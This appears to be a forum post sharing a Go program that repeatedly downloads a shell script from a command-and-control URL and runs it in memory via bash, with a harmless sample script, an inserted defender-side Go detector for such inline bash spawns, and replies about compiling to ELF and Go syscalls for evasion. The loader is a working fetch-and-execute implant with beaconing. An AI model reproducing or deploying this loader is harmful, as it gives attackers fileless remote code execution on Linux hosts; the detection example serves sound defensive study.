Some days ago I was wondering about some new idea to code in Go, and I had this idea: something similar to PowerShell “DownloadString” but for a Linux environment!
It's very simple: the code reads your shell script body from your C&C, keeps it in memory (within a variable), then executes it directly in bash.
I didn't test deeply; I did some basic tests, and it worked.
```go
package main

import (
	"io/ioutil"
	"net/http"
	"os/exec"
	"time"
)

func main() {
	for {
		url := "http://my_command_control:8080/executeThisScript" // Download your bash script
		resp, _ := http.Get(string(url))
		defer resp.Body.Close()
		shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory
		cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
		cmd.Start()      // run in background
		time.Sleep(5000) // wait for the next beaconing
	}
}
```
Example of a dumb shell script for the PoC:

```bash
#!/bin/bash
if [ ! -d /tmp/testDir ]; then
    mkdir /tmp/testDir
fi
cd /tmp/testDir
touch test.sh
ifconfig > ifconfig.log
```
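A defender-side view of the loader above, as an added example that is not part of the original post: the script body never touches disk, but it is still passed as the argv of `/bin/bash -c`, so process-start telemetry sees it in full. The `ExecEvent` type, its field names, the `/opt/example/agent` path and the thresholds are assumptions, and the sample records are constructed.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ExecEvent is a hypothetical process-start record; map it from auditd, eBPF or EDR data.
type ExecEvent struct {
	ParentExe string   // executable path of the parent process
	Argv      []string // argv of the newly started process
}

var shells = map[string]bool{"sh": true, "bash": true, "dash": true}

// InlineScript reports whether ev is a shell started with -c whose command
// string looks like a whole script body (shebang or 4+ lines), not a one-liner.
func InlineScript(ev ExecEvent) bool {
	if len(ev.Argv) < 3 || !shells[filepath.Base(ev.Argv[0])] || ev.Argv[1] != "-c" {
		return false
	}
	body := strings.TrimSpace(ev.Argv[2])
	return strings.HasPrefix(body, "#!") || strings.Count(body, "\n") >= 3
}

// RepeatOffenders returns parents with at least threshold inline-script spawns (a polling loop).
func RepeatOffenders(evs []ExecEvent, threshold int) map[string]int {
	counts := map[string]int{}
	for _, ev := range evs {
		if InlineScript(ev) {
			counts[ev.ParentExe]++
		}
	}
	for parent, n := range counts {
		if n < threshold {
			delete(counts, parent)
		}
	}
	return counts
}

func main() {
	// Constructed records, not captured telemetry.
	poc := "#!/bin/bash\nif [ ! -d /tmp/testDir ]; then\nmkdir /tmp/testDir\nfi\ncd /tmp/testDir"
	agent := ExecEvent{"/opt/example/agent", []string{"/bin/bash", "-c", poc}}
	cron := ExecEvent{"/usr/sbin/cron", []string{"/bin/sh", "-c", "run-parts /etc/cron.hourly"}}
	fmt.Println(RepeatOffenders([]ExecEvent{agent, cron, agent, agent}, 3))
}
```

The match is a heuristic: some legitimate tools also pass multi-line commands to `sh -c`, so the parent path and the repeat count are what make a hit worth triaging.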
Yeah, it's just a way to execute it in Go.
Unlike PHP, Go can be compiled into an ELF file; PHP can't be compiled to ELF.
But what I coded can be done in PHP also.
I had talked to a Go evasion tool developer; he had mentioned golang provides its own syscalls. If anyone knows / can clarify on that I would greatly appreciate it.
An interesting link down that rabbit hole - golang.org/x/sys